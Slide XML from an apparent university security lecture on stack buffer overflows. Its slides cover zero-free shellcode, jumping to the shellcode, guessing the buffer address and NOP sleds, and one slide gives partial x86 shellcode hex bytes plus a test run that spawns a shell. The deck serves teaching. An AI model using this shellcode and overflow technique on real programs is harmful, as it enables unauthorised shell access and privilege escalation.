              <a:t>ebx,ebx</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax,ebx</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17183774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Testing the Zero-free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>"\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xdc</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  shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>shellcode</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vigna@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>~: ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>testsc</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bash$ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28269131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dirty="0"/>
              <a:t>Jumping to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to jump to the shell code we need to overflow a target buffer with a string that contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> repeatedly </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3417092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902" name="Rectangle 14" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2343150"/>
            <a:ext cx="4038600" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wave">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Buffer addr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549890" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jumping to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549892" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2343150"/>
            <a:ext cx="29718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3" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="234315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4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="234315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5" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="2343150"/>
            <a:ext cx="28194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latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549896" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2270125" y="1910954"/>
            <a:ext cx="8026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Buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549897" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191001" y="1943100"/>
            <a:ext cx="45663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FP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549898" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800601" y="1943100"/>
            <a:ext cx="60785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RET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549899" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="1943100"/>
            <a:ext cx="91649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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549901" name="Rectangle 13" descr="Horizontal brick"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2343150"/>
            <a:ext cx="1905000" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="horzBri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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549903" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3257550"/>
            <a:ext cx="59436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49904" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581401" y="3257550"/>
            <a:ext cx="1341646"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Long String</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549906" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1066800" y="2971800"/>
            <a:ext cx="0" cy="2857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49907" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010400" y="302895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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31875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vs. Local Attacks </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a:t>Local attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through local interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require a previously-established presence on the host (e.g., an account, or another application under the control of the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with privileges that are different (usually superior) from the ones that the attacker would otherwise have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, these attacks are easier to perform, because the attacker has a better control of the environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through network-based interactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthenticated remote attacks: Interaction with the application does not require authentication or prior capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with the privileges of the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, these attacks are more difficult to perform but they do not require prior access to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7319380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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Guessing the Buffer Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548869" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In most cases the address of the buffer is not known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It has to be “guessed” (and the guess must be VERY precise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stack address of a program can be obtained by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assumption: No stack randomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given the same environment and knowing the size of command-line parameters, the address of the stack can be roughly guessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We also have to guess the offset of the buffer with respect to the stack pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5367790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NOP Sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550915" name="Rectangle 3" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="3543300"/>
            <a:ext cx="3276600" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wave">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Almost the buffer addr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550916" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3543300"/>
            <a:ext cx="29718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7" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="354330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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="354330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9" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="3543300"/>
            <a:ext cx="28194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20" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2270125" y="3111103"/>
            <a:ext cx="8026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Buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550921" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191001" y="3143250"/>
            <a:ext cx="45663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FP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550922" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800601" y="3143250"/>
            <a:ext cx="60785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RET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550923" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="3143250"/>
            <a:ext cx="91649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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550924" name="Rectangle 12" descr="Horizontal brick"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3543300"/>
            <a:ext cx="1905000" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="horzBri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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550925" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4457700"/>
            <a:ext cx="59436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50926" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581401" y="4457700"/>
            <a:ext cx="1341646"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Long String</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550927" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1066800" y="4171950"/>
            <a:ext cx="0" cy="2857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28" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010400" y="422910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29" name="Rectangle 17" descr="5%"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3543300"/>
            <a:ext cx="838200" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5">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NOPs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550930" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="4171950"/>
            <a:ext cx="37338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50931" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1447800" y="394335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2" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3543300"/>
            <a:ext cx="8382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33" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="2457450"/>
            <a:ext cx="0" cy="10287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4" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="2400300"/>
            <a:ext cx="153118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 Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550935" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="2571750"/>
            <a:ext cx="0" cy="9715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6" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="2857500"/>
            <a:ext cx="6934200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="me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7" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
